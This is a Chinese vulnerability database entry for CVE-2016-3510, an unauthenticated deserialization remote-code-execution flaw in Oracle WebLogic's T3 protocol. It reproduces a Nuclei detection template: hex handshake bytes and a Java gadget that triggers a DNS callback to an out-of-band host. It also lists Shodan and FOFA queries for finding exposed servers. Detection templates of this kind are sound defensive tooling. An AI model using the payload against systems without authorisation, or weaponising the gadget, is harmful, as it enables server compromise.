Oracle WebLogic Server Java Object Deserialization Remote Code Execution

漏洞信息

漏洞名称： Oracle WebLogic Server Java Object Deserialization Remote Code Execution

漏洞编号：

• CVE： CVE-2016-3510

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： Oracle WebLogic Server是Oracle公司开发的一个企业级应用服务器，广泛用于部署和运行大型分布式Java应用程序。它支持Java EE标准，提供了丰富的功能集，包括事务管理、安全性、集群和高可用性等。由于其广泛的应用，WebLogic Server成为了攻击者的重要目标。

该漏洞存在于Oracle WebLogic Server的WLS Core Components中，属于反序列化漏洞。攻击者可以通过构造恶意的序列化对象，利用WebLogic Server的T3协议进行远程代码执行。漏洞的根本原因在于WebLogic Server在处理反序列化数据时，未能正确验证输入数据的合法性，导致攻击者可以执行任意代码。

此漏洞的影响极为严重，攻击者无需认证即可远程利用，完全控制受影响的服务器。攻击者可以利用此漏洞窃取敏感数据、植入恶意软件、或发起进一步的网络攻击。由于WebLogic Server通常部署在企业内部网络的核心位置，一旦被攻破，可能导致整个企业网络的安全受到威胁。此外，该漏洞的利用代码已在互联网上公开，增加了被大规模利用的风险。

产品厂商： Oracle

产品名称： WebLogic Server

影响版本： 10.3.6.0, 12.1.3.0, 12.2.1.0

搜索语法： product:”oracle weblogic”, http.title:”oracle peoplesoft sign-in”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/5288bea871d90346cf385e92ed30c3a5882d37f7/network%2Fcves%2F2016%2FCVE-2016-3510.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2016-3510

info:
  name: Oracle WebLogic Server Java Object Deserialization -  Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
  remediation: |
    Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
  reference:
    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
    - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
    - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
    - http://www.securitytracker.com/id/1036373
    - https://www.tenable.com/security/research/tra-2016-21
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3510
    cwe-id: CWE-119
    epss-score: 0.93179
    epss-percentile: 0.99789
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - product:"oracle weblogic"
      - http.title:"oracle peoplesoft sign-in"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp

variables:
  start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"
  end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078"

tcp:
  - inputs:
      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
        read: 1024

      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"

    host:
      - "{{Hostname}}"
      - "{{Host}}:7001"

    read-size: 4
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100ea029832c0ab04118402ee3841955fe976f1a6733c03db8927824a3743216230022100da060ca8b653feeaf33f063732129911e95190383cbf70f8e7c43c1288f8f837:922c64590222798bb761d5b6d8e72950